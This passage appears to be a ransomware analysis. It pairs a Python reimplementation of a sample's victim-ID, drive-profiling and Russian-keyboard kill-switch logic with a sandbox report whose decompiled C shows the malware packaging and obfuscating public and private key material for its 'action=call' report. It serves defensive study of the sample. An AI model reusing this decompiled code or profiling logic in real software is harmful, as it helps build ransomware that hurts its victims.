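    """drives: {letter: (drive_type, geometry)}; geometry is
    (sectors_per_cluster, bytes_per_sector, free_clusters, total_clusters)
    or None when GetDiskFreeSpaceW would fail.
    Returns the string the sample stores at offset 0x7c."""
    parts = []
    for letter in sorted(drives):                 # sample walks A..Z
        drive_type, geometry = drives[letter]
        # Only type > 2 and != 5 is kept: FIXED, REMOTE, RAMDISK.
        # CDROM and removable media are skipped, so USB sticks never show up.
        if drive_type <= 2 or drive_type == 5:
            continue
        entry = f"{letter}:{DRIVE_TYPE_NAMES[drive_type]}_"
        if geometry is None:
            entry += "0"                          # lstrcatW(buf, L"0,")
        else:
            spc, bps, free_clusters, total_clusters = geometry
            cluster = spc * bps
            total = total_clusters * cluster      # 64-bit product, %I64u
            used = total - free_clusters * cluster
            entry += f"{total}/{used}"
        parts.append(entry)
    return ",".join(parts)                        # trailing comma is cut off


def build_id_buffer(volume_serial, processor_name, identifier):
    """Buffer at offset 0x68: wsprintfW("%d", serial), then ProcessorNameString
    and, only when that registry read succeeded, Identifier appended to it."""
    # wsprintfW "%d" prints the DWORD serial as a signed 32-bit integer.
    serial = volume_serial - (1 << 32) if volume_serial & 0x80000000 else volume_serial
    buf = str(serial)
    if processor_name:
        buf += processor_name + identifier
    return buf


def compute_victim_id(id_buffer):
    """RtlComputeCrc32(0x29a, buf, len) modelled as zlib.crc32(buf, 0x29a).
    Assumption: the sample hashes the UTF-16LE bytes of the buffer."""
    return zlib.crc32(id_buffer.encode("utf-16-le"), CRC_SEED)


def russian_layout_present(preload_values):
    """Kill switch: Preload values "1".."8" are read in order and compared
    case-insensitively (lstrcmpiW) with "00000419"; the loop stops at the
    first value name that does not exist."""
    for n in range(1, 9):
        value = preload_values.get(str(n))
        if value is None:
            return False
        if value.lower() == "00000419":
            return True
    return False


# Constructed inputs for the demonstration (not observed in the sandbox run).
SAMPLE_DRIVES = {
    "C": (3, (8, 512, 1000, 5000)),   # FIXED, 4096-byte clusters
    "D": (5, (1, 2048, 0, 100)),      # CDROM: skipped by the sample
    "E": (2, (8, 512, 10, 20)),       # REMOVABLE: skipped by the sample
    "F": (4, None),                   # REMOTE share, GetDiskFreeSpaceW fails
    "G": (6, (1, 512, 0, 10)),        # RAMDISK, completely used
}

if __name__ == "__main__":
    print(build_drive_string(SAMPLE_DRIVES))
    buf = build_id_buffer(0x1A2B3C4D, "Intel(R) Core(TM) i5 CPU",
                          "Intel64 Family 6 Model 158 Stepping 10")
    print(buf, "->", f"{compute_victim_id(buf):08x}")
    print("russian layout:", russian_layout_present({"1": "00000409"}))
```

Two points worth checking against a live run before relying on the reproduced ID: the "%d" conversion makes serials with the top bit set appear negative in the hashed buffer, and the Identifier string is only appended when the ProcessorNameString read succeeded, so a host missing that value gets a different ID than one would expect from the registry alone.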
                                        0x0fc67330
                                        0x0fc67330
                                        0x0fc6733b
                                        0x0fc67347
                                        0x0fc67357
                                        0x0fc67359
                                        0x0fc6735c
                                        0x0fc67361
                                        0x0fc67368
                                        0x0fc67368
                                        0x0fc67372
                                        0x0fc6737f
                                        0x0fc67386
                                        0x0fc67388
                                        0x0fc6738b
                                        0x0fc67390
                                        0x0fc67390
                                        0x0fc673a0
                                        0x0fc673f6
                                        0x0fc673fa
                                        0x0fc67495
                                        0x0fc67499
                                        0x0fc67599
                                        0x0fc6759d
                                        0x0fc675ad
                                        0x0fc675af
                                        0x0fc675c5
                                        0x0fc675c8
                                        0x0fc675cf
                                        0x0fc675d1
                                        0x0fc675e9
                                        0x0fc675f6
                                        0x0fc675f8
                                        0x0fc675f8
                                        0x0fc675cf
                                        0x0fc675ff
                                        0x0fc6766e
                                        0x0fc67672
                                        0x0fc67677
                                        0x0fc67683
                                        0x0fc6768a
                                        0x0fc6768c
                                        0x0fc6768c
                                        0x0fc6768a
                                        0x0fc67693
                                        0x0fc676a7
                                        0x0fc676b7
                                        0x0fc676ba
                                        0x0fc676bc
                                        0x0fc676c4
                                        0x0fc676cc
                                        0x0fc676cc
                                        0x0fc676d7
                                        0x0fc676db
                                        0x0fc676e2
                                        0x0fc676e9
                                        0x0fc676f6
                                        0x0fc676fe
                                        0x0fc67704
                                        0x0fc6770a
                                        0x0fc6770a
                                        0x0fc67720
                                        0x0fc67727
                                        0x0fc67729
                                        0x0fc67730
                                        0x0fc67736
                                        0x0fc67736
                                        0x0fc6773c
                                        0x0fc67755
                                        0x0fc67755
                                        0x0fc67768
                                        0x0fc67770
                                        0x0fc67776
                                        0x0fc6777d
                                        0x0fc67790
                                        0x0fc67796
                                        0x0fc6779b
                                        0x0fc677b9
                                        0x0fc6779d
                                        0x0fc677b4
                                        0x0fc677b4
                                        0x0fc677ce
                                        0x0fc677d1
                                        0x0fc677d1
                                        0x0fc677e3
                                        0x0fc67992
                                        0x0fc67999
                                        0x0fc679e2
                                        0x0fc679eb
                                        0x0fc679eb
                                        0x0fc679a9
                                        0x0fc679af
                                        0x0fc679b7
                                        0x0fc679d6
                                        0x0fc679d6
                                        0x00000000
                                        0x0fc679d6
                                        0x0fc679b9
                                        0x0fc679bb
                                        0x0fc679c2
                                        0x00000000
                                        0x00000000
                                        0x0fc679d0
                                        0x00000000
                                        0x0fc677e9
                                        0x0fc677f7
                                        0x0fc677fe
                                        0x0fc67805
                                        0x0fc6780c
                                        0x0fc67813
                                        0x0fc6781a
                                        0x0fc67821
                                        0x0fc67828
                                        0x0fc6782e
                                        0x0fc67831
                                        0x0fc67834
                                        0x0fc67840
                                        0x0fc67840
                                        0x0fc67843
                                        0x0fc67846
                                        0x0fc67847
                                        0x0fc6784d
                                        0x0fc67852
                                        0x0fc67855
                                        0x0fc6785a
                                        0x0fc6785d
                                        0x0fc6785f
                                        0x0fc67862
                                        0x0fc67867
                                        0x0fc6786f
                                        0x0fc67875
                                        0x0fc6787a
                                        0x0fc6788b
                                        0x0fc67896
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                        • GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                        • VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                        • GetComputerNameW.KERNEL32 ref: 0FC67390
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                        • wsprintfW.USER32 ref: 0FC673F1
                                        • VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                        • RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                        • GetLastError.KERNEL32 ref: 0FC67469
                                        • RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC6748F
                                        • VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0FC674AD
                                        • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FC674C3
                                        • wsprintfW.USER32 ref: 0FC674DD
                                        • RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FC674FF
                                        • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0FC64640,?), ref: 0FC67521
                                        • GetLastError.KERNEL32 ref: 0FC67534
                                        • RegCloseKey.KERNEL32(?), ref: 0FC6753D
                                        • lstrcmpiW.KERNEL32(0FC64640,00000419), ref: 0FC67551
                                        • wsprintfW.USER32 ref: 0FC6757E
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC6758D
                                        • VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0FC675AD
                                        • wsprintfW.USER32 ref: 0FC675F6
                                        • GetNativeSystemInfo.KERNEL32(?), ref: 0FC67605
                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0FC67616
                                        • wsprintfW.USER32 ref: 0FC6763A
                                        • ExitProcess.KERNEL32 ref: 0FC67641
                                        • wsprintfW.USER32 ref: 0FC67669
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC676A7
                                        • VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0FC676BA
                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FC676C4
                                        • GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FC676FE
                                        • lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FC67730
                                        • wsprintfW.USER32 ref: 0FC67768
                                        • lstrcatW.KERNEL32(?,0000060C), ref: 0FC6777D
                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FC67789
                                        • GetProcAddress.KERNEL32(00000000), ref: 0FC67790
                                        • lstrlenW.KERNEL32(?), ref: 0FC677A0
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FC677D1
                                          • Part of subcall function 0FC67A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,74CB66A0,?,7491C0B0), ref: 0FC67A2D
                                          • Part of subcall function 0FC67A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FC67AA1
                                          • Part of subcall function 0FC67A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FC67AB6
                                          • Part of subcall function 0FC67A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FC67ACC
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC67828
                                        • GetDriveTypeW.KERNEL32(?), ref: 0FC6786F
                                        • lstrcatW.KERNEL32(?,?), ref: 0FC67896
                                        • lstrcatW.KERNEL32(?,0FC7029C), ref: 0FC678A8
                                        • lstrcatW.KERNEL32(?,0FC70310), ref: 0FC678B2
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,0FC64640,?,00000000), ref: 0FC678C8
                                        • lstrlenW.KERNEL32(?,?,00000000,0FC64640,00000000,00000000,00000000,0FC64640,00000000), ref: 0FC67910
                                        • wsprintfW.USER32 ref: 0FC6792A
                                        • lstrlenW.KERNEL32(?), ref: 0FC67938
                                        • wsprintfW.USER32 ref: 0FC6794C
                                        • lstrcatW.KERNEL32(?,0FC70330), ref: 0FC6795F
                                        • lstrcatW.KERNEL32(?,0FC70334), ref: 0FC6796B
                                        • lstrlenW.KERNEL32(?), ref: 0FC67986
                                        • VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0FC679A9
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0FC679D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
                                        • String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
                                        • API String ID: 153366582-983031137
                                        • Opcode ID: d39547f3d5a597cdeb424ba77768e8e680b2aa8858c0f12f6d167dd7676fc163
                                        • Instruction ID: 14d03fbbd700e46dad958df07f2b596e6090ac8cd4f42c20a9822ae81aa91d8e
                                        • Opcode Fuzzy Hash: d39547f3d5a597cdeb424ba77768e8e680b2aa8858c0f12f6d167dd7676fc163
                                        • Instruction Fuzzy Hash: 7812AF70A84306EBEB218FA5CC87FAABBB4FF04715F100529F742B6191DBB5A514CB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        (Rendered graph of function fc65880 with executed / not executed block colouring; the raw node-and-edge listing is not reproduced here.)
                                        C-Code - Quality: 79%
                                        			E0FC65880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                        				char _v295;
                                        				char _v296;
                                        				char _v404;
                                        				char _v408;
                                        				void* _v428;
                                        				CHAR* _v432;
                                        				int _v436;
                                        				int _v440;
                                        				char _v442;
                                        				CHAR* _v444;
                                        				short _v448;
                                        				int _v452;
                                        				char _v456;
                                        				CHAR* _v464;
                                        				int _v468;
                                        				void* _v472;
                                        				BYTE* _v476;
                                        				WCHAR* _v480;
                                        				WCHAR* _v484;
                                        				void* _v488;
                                        				void* _v492;
                                        				short* _v496;
                                        				CHAR* _v500;
                                        				void* _v504;
                                        				long _v508;
                                        				CHAR* _v512;
                                        				CHAR* _v528;
                                        				CHAR* _t133;
                                        				void* _t135;
                                        				int _t145;
                                        				void* _t148;
                                        				int _t149;
                                        				void* _t150;
                                        				void* _t152;
                                        				signed int _t159;
                                        				signed int _t163;
                                        				void* _t168;
                                        				void* _t170;
                                        				signed int _t172;
                                        				void* _t183;
                                        				CHAR* _t185;
                                        				long _t189;
                                        				intOrPtr _t199;
                                        				int _t200;
                                        				void _t202;
                                        				int _t203;
                                        				void _t204;
                                        				int _t205;
                                        				long _t213;
                                        				void* _t219;
                                        				short _t228;
                                        				char* _t229;
                                        				WCHAR* _t231;
                                        				short _t233;
                                        				CHAR* _t234;
                                        				char _t235;
                                        				void* _t238;
                                        				long _t240;
                                        				long _t241;
                                        				void* _t243;
                                        				void* _t245;
                                        				short _t248;
                                        				int _t249;
                                        				void* _t255;
                                        				CHAR* _t256;
                                        				WCHAR* _t258;
                                        				WCHAR* _t259;
                                        				signed int _t261;
                                        				CHAR* _t262;
                                        				CHAR* _t263;
                                        				signed int _t266;
                                        				int _t267;
                                        				void* _t268;
                                        				long _t271;
                                        				void* _t272;
                                        				void* _t273;
                                        				long _t279;
                                        				int _t280;
                                        				long _t281;
                                        				void* _t282;
                                        				CHAR* _t283;
                                        				short _t284;
                                        
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_v456 = __ecx;
                                        				_v436 = __edx;
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				_push(1);
                                        				_push(__ecx);
                                        				_push(1);
                                        				E0FC639F0( &_v404);
                                        				E0FC67330( &_v492, __edx); // executed
                                        				_t255 = E0FC67140( &_v492);
                                        				_t266 = _a8 + __edx;
                                        				_t7 = _t266 + 8; // 0x8
                                        				_t213 = _t255 + _t7 * 8 << 3;
                                        				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40); // executed
                                        				_t248 = 0;
                                        				_v512 = _t133;
                                        				_v528 = _t133;
                                        				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
                                        				if(_t133 == 0 || _t228 >= _t213) {
                                        					_v448 = _t248;
                                        					_t256 = _t133;
                                        				} else {
                                        					_t256 =  &(_t133[_t228]);
                                        					_v448 = _t133;
                                        					_v444 = _t256;
                                        					_t248 = _t228;
                                        				}
                                        				_t135 = 2 + _a8 * 8;
                                        				if(_v428 == 0) {
                                        					L7:
                                        					_t229 = 0;
                                        					_v432 = 0;
                                        				} else {
                                        					_t284 = _t248 + _t135;
                                        					if(_t284 >= _t213) {
                                        						goto L7;
                                        					} else {
                                        						_t229 = _t256;
                                        						_v432 = _t256;
                                        						_t256 =  &(_t256[_t135]);
                                        						_t248 = _t284;
                                        						_v444 = _t256;
                                        					}
                                        				}
                                        				_t267 = _v440;
                                        				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
                                        					_t256 = 0;
                                        					_v444 = 0;
                                        				}
                                        				if(_t229 == 0) {
                                        					goto L53;
                                        				} else {
                                        					_t249 = _a8;
                                        					_v436 = _t249 + _t249;
                                        					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
                                        					_v452 = _t267 + _t267;
                                        					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
                                        					_t145 = lstrlenA(_t256);
                                        					_t271 = _t145 + lstrlenA(_v464) + 0x42;
                                        					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40); // executed
                                        					_v472 = _t148;
                                        					_v488 = _t148;
                                        					_v492 = 0;
                                        					_t149 = lstrlenA(_v464);
                                        					_t231 = _v472;
                                        					_t150 = _t149 + 1;
                                        					if(_t231 == 0 || _t150 >= _t271) {
                                        						_v484 = 0;
                                        					} else {
                                        						_v492 = _t150;
                                        						_v488 = _t231 + _t150;
                                        						_v484 = _t231;
                                        					}
                                        					_t152 = lstrlenA(_t256) + 1;
                                        					if(_v472 == 0 || _t152 + _v492 >= _t271) {
                                        						_v488 = 0;
                                        					}
                                        					_t272 = 0;
                                        					if(lstrlenA(_v464) != 0) {
                                        						_t245 = _v484;
                                        						_t263 = _v464;
                                        						_v492 = _t245;
                                        						do {
                                        							_t204 =  *((intOrPtr*)(_t272 + _t263));
                                        							if(_t204 != 0xa && _t204 != 0xd) {
                                        								 *_t245 = _t204;
                                        								_v492 = _t245 + 1;
                                        							}
                                        							_t272 = _t272 + 1;
                                        							_t205 = lstrlenA(_t263);
                                        							_t245 = _v492;
                                        						} while (_t272 < _t205);
                                        						_t256 = _v476;
                                        					}
                                        					_t273 = 0;
                                        					if(lstrlenA(_t256) != 0) {
                                        						_t243 = _v488;
                                        						_v492 = _t243;
                                        						do {
                                        							_t202 =  *((intOrPtr*)(_t273 + _t256));
                                        							if(_t202 != 0xa && _t202 != 0xd) {
                                        								 *_t243 = _t202;
                                        								_v492 = _t243 + 1;
                                        							}
                                        							_t273 = _t273 + 1;
                                        							_t203 = lstrlenA(_t256);
                                        							_t243 = _v492;
                                        						} while (_t273 < _t203);
                                        					}
                                        					_t258 = _v480;
                                        					lstrcatW(_t258, L"action=call&");
                                        					_t259 =  &(_t258[lstrlenW(_t258)]);
                                        					E0FC66F40( &_v440, _t259); // executed
                                        					lstrcatW(_t259, L"&pub_key=");
                                        					_t159 = lstrlenW(_t259);
                                        					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
                                        					lstrcatW(_t259, L"&priv_key=");
                                        					_t163 = lstrlenW(_t259);
                                        					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
                                        					lstrcatW(_t259, L"&version=2.3r");
                                        					_t279 = (lstrlenW(_v484) << 4) + 0x12;
                                        					_t168 = VirtualAlloc(0, _t279, 0x3000, 0x40); // executed
                                        					_t219 = _t168;
                                        					_v480 = _t219;
                                        					_t170 = 2 + lstrlenW(_v484) * 8;
                                        					if(_t219 == 0 || _t170 >= _t279) {
                                        						_v492 = 0;
                                        					} else {
                                        						_v492 = _t219;
                                        					}
                                        					_t172 = lstrlenW(_v480);
                                        					_t233 = "#shasj"; // 0x61687323
                                        					_t261 = _t172;
                                        					asm("movq xmm0, [0xfc6fc78]");
                                        					_v448 = _t233;
                                        					_t234 =  *0xfc6fc84; // 0x6a73
                                        					_v444 = _t234;
                                        					_t235 =  *0xfc6fc86; // 0x0
                                        					asm("movq [esp+0x3c], xmm0");
                                        					_v442 = _t235;
                                        					_v296 = 0;
                                        					E0FC69010( &_v295, 0, 0xff);
                                        					E0FC65D70( &_v296,  &_v456, lstrlenA( &_v456));
                                        					_t280 = _t261 + _t261;
                                        					E0FC65E20( &_v296, _v480, _t280);
                                        					_t262 = _v492;
                                        					_v468 = _t261 * 8;
                                        					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
                                        						GetLastError();
                                        					}
                                        					_t105 = lstrlenA(_t262) + 2; // 0x2
                                        					_t281 = _t105;
                                        					_t183 = VirtualAlloc(0, _t281, 0x3000, 0x40); // executed
                                        					_v504 = _t183;
                                        					_t107 = lstrlenA(_t262) + 1; // 0x1
                                        					_t238 = _t107;
                                        					_t185 = _v504;
                                        					if(_t185 == 0) {
                                        						L40:
                                        						_v500 = 0;
                                        					} else {
                                        						_v500 = _t185;
                                        						if(_t238 >= _t281) {
                                        							goto L40;
                                        						}
                                        					}
                                        					_t282 = 0;
                                        					if(lstrlenA(_t262) != 0) {
                                        						_t241 = _v500;
                                        						_v508 = _t241;
                                        						do {
                                        							_t199 =  *((intOrPtr*)(_t282 + _t262));
                                        							if(_t199 != 0xa && _t199 != 0xd) {
                                        								 *_t241 = _t199;
                                        								_v508 = _t241 + 1;
                                        							}
                                        							_t282 = _t282 + 1;
                                        							_t200 = lstrlenA(_t262);
                                        							_t241 = _v508;
                                        						} while (_t282 < _t200);
                                        					}
                                        					_t283 = _v500;
                                        					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
                                        					_v508 = 0;
                                        					_t189 = E0FC654A0(_t283,  &_v508, 1); // executed
                                        					if(_t189 != 0) {
                                        						_t240 = _v508;
                                        						if(_t240 != 0) {
                                        							 *_a12 = _t240;
                                        						}
                                        						VirtualFree(_v504, 0, 0x8000);
                                        						VirtualFree(_v492, 0, 0x8000);
                                        						VirtualFree(_v488, 0, 0x8000);
                                        						L53:
                                        						_t268 = 1;
                                        					} else {
                                        						VirtualFree(_v504, _t189, 0x8000);
                                        						VirtualFree(_v492, 0, 0x8000);
                                        						VirtualFree(_v488, 0, 0x8000);
                                        						_t268 = 0;
                                        					}
                                        				}
                                        				VirtualFree(_v428, 0, 0x8000);
                                        				E0FC67C10( &_v408);
                                        				return _t268;
                                        			}

                                        APIs
                                          • Part of subcall function 0FC639F0: GetProcessHeap.KERNEL32(?,?,0FC64637,00000000,?,00000000,00000000), ref: 0FC63A8C
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FC67357
                                          • Part of subcall function 0FC67330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FC67368
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FC67386
                                          • Part of subcall function 0FC67330: GetComputerNameW.KERNEL32 ref: 0FC67390
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC673B0
                                          • Part of subcall function 0FC67330: wsprintfW.USER32 ref: 0FC673F1
                                          • Part of subcall function 0FC67330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FC6740E
                                          • Part of subcall function 0FC67330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FC67432
                                          • Part of subcall function 0FC67330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FC64640,?), ref: 0FC67456
                                          • Part of subcall function 0FC67330: RegCloseKey.KERNEL32(00000000), ref: 0FC67472
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67192
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6719D
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671B3
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671BE
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671D4
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671DF
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC671F5
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(0FC64966,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67200
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67216
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67221
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67237
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67242
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC67261
                                          • Part of subcall function 0FC67140: lstrlenW.KERNEL32(?,?,?,?,0FC64649,00000000,?,00000000,00000000,?,00000000), ref: 0FC6726C
                                        • VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 0FC658F0
                                        • CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0FC6599A
                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0FC659B3
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC659BC
                                        • lstrlenA.KERNEL32(?), ref: 0FC659C4
                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0FC659D5
                                        • lstrlenA.KERNEL32(?), ref: 0FC659EF
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65A18
                                        • lstrlenA.KERNEL32(?), ref: 0FC65A38
                                        • lstrlenA.KERNEL32(?), ref: 0FC65A64
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65A75
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65A97
                                        • lstrcatW.KERNEL32(?,action=call&), ref: 0FC65AB1
                                        • lstrlenW.KERNEL32(?), ref: 0FC65ABA
                                        • lstrcatW.KERNEL32(?,&pub_key=), ref: 0FC65ACF
                                        • lstrlenW.KERNEL32(?), ref: 0FC65AD2
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65ADB
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 0FC65AF0
                                        • lstrcatW.KERNEL32(?,&priv_key=), ref: 0FC65AFC
                                        • lstrlenW.KERNEL32(?), ref: 0FC65AFF
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65B0C
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 0FC65B21
                                        • lstrcatW.KERNEL32(?,&version=2.3r), ref: 0FC65B2D
                                        • lstrlenW.KERNEL32(?), ref: 0FC65B39
                                        • VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 0FC65B4D
                                        • lstrlenW.KERNEL32(?), ref: 0FC65B5D
                                        • lstrlenW.KERNEL32(?), ref: 0FC65B7E
                                        • _memset.LIBCMT ref: 0FC65BC7
                                        • lstrlenA.KERNEL32(?), ref: 0FC65BDA
                                          • Part of subcall function 0FC65D70: _memset.LIBCMT ref: 0FC65D9D
                                        • CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 0FC65C26
                                        • GetLastError.KERNEL32 ref: 0FC65C30
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C37
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FC65C46
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C51
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C71
                                        • lstrlenA.KERNEL32(?), ref: 0FC65C94
                                        • lstrlenA.KERNEL32(00000000), ref: 0FC65CA3
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 0FC65CB4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65CE7
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65CF4
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D01
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D26
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D33
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D40
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65D5A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
